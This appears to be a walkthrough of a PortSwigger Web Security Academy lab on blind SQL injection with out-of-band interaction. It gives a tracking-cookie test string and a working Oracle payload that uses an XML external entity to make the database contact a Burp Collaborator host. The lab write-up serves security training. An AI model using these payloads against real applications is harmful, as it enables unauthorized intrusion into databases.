Blind SQL Injection with Out-of-band Interaction- PortSwigger Lab Walkthrough

Introduction

In this walkthrough, we will exploit a blind SQL injection Vulnerability that allows out-of-band(OAST) interaction using Burp Collaborator. This lab is from PostSwigger’s Web Security Academy and requires us to generate a DNS lookup to an external server.

Understanding the Lab

The application:

1. Uses a tracking cookie for analytics.

2. Executes a SQL query containing the submitted cookie value.

3. Runs the SQL query asynchronously, meaning no response-based evidence of injection.

4. Allows out-of-band(OOB) interactions with an external domain.

To solve this, we must trigger a DNS lookup to Burp Collaborator by injecting a SQL payload.

Exploitation Steps

Step 1: Set Up Burp Collaborator

1. Open Burp Suite —> Go to Burp Collaborator.

2. Click Copy to clipboard to get your unique Burp Collaborator payload(e.g., xyz.burpcollaborator.net).

Step 2: Identify the Injection Point

1. Open Burp Suite Proxy and capture a request that contains a tracking cookie(likely in the Cookie header).

2. Send the request to Burp Repeater and modify the cookie value to test for injection:

   ‘ OR ‘1’=’1

3. Observe that no immediate response change confirms SQL injection, suggesting blind injection.

Step 3: Trigger an Out-of-Band DNS Lookup

Inject a payload that forces a DNS lookup to Burp Collaborator:

TrackingId=x'+UNION+SELECT+EXTRACTVALUE(xmltype('<%3fxml+version%3d"1.0"+encoding%3d"UTF-8"%3f><!DOCTYPE+root+[+<!ENTITY+%25+remote+SYSTEM+"http%3a//BURP-COLLABORATOR-SUBDOMAIN/">+%25remote%3b]>'),'/l')+FROM+dual--

Step 4: Verify the Interaction

1. Go to Burp Collaborator and click Poll Now.

2. If an HTTPS/DNS request appears, the injection worked!

3. The lab should now be solved.

Conclusion

This lab demonstrates a blind SQL injection with OOB interaction, useful when:

1. No direct response-based feedback is available.

2. The database allows external network interactions.

3. Burp Collaborator helps confirm the injection.